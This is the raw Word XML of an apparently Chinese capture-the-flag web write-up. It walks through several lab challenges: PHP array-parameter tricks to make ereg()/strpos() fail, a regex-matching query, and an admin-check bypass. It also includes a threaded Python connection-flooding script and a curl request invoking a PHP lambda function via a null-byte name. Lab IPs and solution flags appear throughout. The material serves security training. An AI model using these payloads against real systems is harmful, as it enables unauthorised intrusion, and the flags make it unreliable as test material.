      <w:r w:rsidRPr="00C941F4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&lt;http://10.137.0.35/41/&gt;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C941F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C941F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地址以真实获取到的为准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C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F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870791" cy="2768708"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="91" name="图片 91" descr="http://192.168.109.235/storage/images/20181210144528s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http://192.168.109.235/storage/images/20181210144528sQl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639" cy="2786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1F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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C941F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941F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C941F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在地址栏输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00C941F4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&lt;http://10.137.0.35/41/</w:t>
      </w:r>
      <w:r w:rsidRPr="006B71DC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?password[]=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C941F4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;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传入数组，得到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C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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275559" cy="1592221"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8255"/>
            <wp:docPr id="90" name="图片 90" descr="http://192.168.109.235/storage/images/201812101446132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http://192.168.109.235/storage/images/201812101446132ny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498" cy="1601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1F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4"/>
    <w:p w:rsidR="001D1A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到底传什么值</w:t>
      </w:r>
      <w:r w:rsidR="00C941F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>呢？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B14557" w:rsidRDefault="007019DB" w:rsidP="00B14557">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>arrayagainb0ys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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C941F4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C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F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941F4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C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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C941F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>传入数组使</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C941F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ereg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C941F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00C941F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C941F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>strpos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C941F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00C941F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数报错，得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00C941F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F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941F4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C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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C941F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数利用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F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941F4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C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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/43,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C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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C941F4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C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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传入数组使</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ereg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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()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和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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strpos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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()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函数报错，得到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C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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C941F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941F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C941F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打开火狐浏览器，输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00C941F4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&lt;http://10.137.0.20/43/&gt;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C941F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C941F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地址以真实获取到的为准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C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F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086578" cy="2463585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="93" name="图片 93" descr="http://192.168.109.235/storage/images/20181210145923L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http://192.168.109.235/storage/images/20181210145923Lup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776" cy="247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1F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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C941F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941F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C941F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在地址栏输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00C941F4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&lt;http://10.137.0.20/43/?password[]=1&gt;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，传入数组报错，得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00C941F4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C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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31302" cy="2750052"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="92" name="图片 92" descr="http://192.168.109.235/storage/images/20181210150012B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://192.168.109.235/storage/images/20181210150012B85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350" cy="277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1F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4"/>
    <w:p w:rsidR="001D1A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>红亚欢迎你</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C017A" w:rsidRPr="000C017A" w:rsidRDefault="000C017A" w:rsidP="000C017A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="0085331E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>152fd8edc2e45df187ce5794bc72803</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718C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C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718C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C0718C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C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718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0718C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C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718C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C0718C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>匹配正则表达式即可</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718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0718C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C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718C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C0718C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正则表达式匹配</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718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0718C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C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718C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/47,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C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718C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C0718C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C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718C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匹配正则表达式即可</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718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C0718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0718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C0718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打开火狐浏览器，输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0718C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&lt;http://10.137.0.80/47/&gt;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C0718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C0718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C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718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357086" cy="1989193"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="95" name="图片 95" descr="http://192.168.109.235/storage/images/20181210154557MX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http://192.168.109.235/storage/images/20181210154557MXz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053" cy="201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18C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718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C0718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0718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C0718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在地址栏输入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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0718C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&lt;http://10.137.0.80/47/</w:t>
      </w:r>
      <w:r w:rsidRPr="006B71DC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?id=welcome_to_/hongyaa/:keya!</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0718C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;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C0718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C0718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）匹配正则表达式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718C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763455" cy="2155879"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="94" name="图片 94" descr="http://192.168.109.235/storage/images/20181210154722j3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http://192.168.109.235/storage/images/20181210154722j3v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170" cy="216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A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单溢出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718C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C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718C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C0718C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C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718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0718C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C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718C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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0718C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718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0718C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C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718C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C0718C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字符串溢出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718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0718C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C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718C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/146,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C0718C" w:rsidRPr="00C0718C" w:rsidRDefault="00C0718C" w:rsidP="00C0718C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C0718C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C0718C" w:rsidRDefault="00C0718C" w:rsidP="002A4A02">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480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C0718C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://10.10.23.105/146/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(IP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地址以实际获取的为准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4955737" cy="2582567"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="97" name="图片 97" descr="http://192.168.109.235/storage/images/201812261735395l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http://192.168.109.235/storage/images/201812261735395lV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729" cy="2607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：利用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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语言</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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输入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admin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用户名和密码（</w:t>
      </w:r>
      <w:r w:rsidRPr="006B71DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B71DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>admin&amp;user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B71DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[]=123456789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），即可得出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C0718C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961916" cy="3003765"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="96" name="图片 96" descr="http://192.168.109.235/storage/images/20181226173547L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http://192.168.109.235/storage/images/20181226173547L47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605" cy="302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A02" w:rsidRPr="00C0718C" w:rsidRDefault="002A4A02" w:rsidP="002A4A02">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="002A4A02">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1f18348f32c9a4694f16426798937ae2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1A80" w:rsidRDefault="006B71DC" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>!!!!!</w:t>
      </w:r>
      <w:r w:rsidR="001D1A80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Anonym</w:t>
      </w:r>
      <w:r w:rsidR="00AC69FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ou</w:t>
      </w:r>
      <w:r w:rsidR="001D1A80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69FF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AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69F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AC69F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AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69F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AC69FF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AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69F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AC69FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>简单粗暴给源码，看着这源码好像在哪看过：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69F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AC69FF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AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69F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AC69FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>信息查看</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69F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AC69FF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AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69FF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AC69FF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AC69FF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AC69FF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（开启虚拟机后可在此查看），获取</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC69FF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AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69F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AC69F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AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69FF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AC69F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简单粗暴给源码，看着这源码好像在哪看过：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69F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010150" cy="2905125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="99" name="图片 99" descr="http://192.168.109.235/storage/images/20190313150629j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://192.168.109.235/storage/images/20190313150629jue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9FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69F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AC69F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直接利用脚本：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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import requests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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import socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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import time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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multiprocessing.dummy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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import Pool as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ThreadPool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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requests.packages.urllib3.disable_warnings()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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except:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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pass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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def run(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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while 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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 HOST='10.121.0.14'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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 PORT=80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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 xml:space="preserve">                s = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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spellStart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socket.AF_INET</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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socket.SOCK_STREAM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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s.connect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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((HOST, PORT))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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s.sendall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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('GET / HTTP/1.1\nHost:10.121.0.14\nConnection: Keep-Alive\n\n')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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 # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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s.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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 print 'ok'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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time.sleep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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spellStart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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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pool = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ThreadPool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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( </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRPr="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="00AC69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result = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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pool.map_async</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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( </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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run,range</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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spellStart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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC69FF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) ).get(0xffff)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC69FF" w:rsidRDefault="00AC69FF" w:rsidP="002A4A02">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:afterAutospacing="1" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480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AC69FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC69FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -b </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC69FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>idlefire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC69FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> "http://10.121.0.14/?func_name=%00lambda_1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC69FF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AC69F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获取到</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC69FF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AC69FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
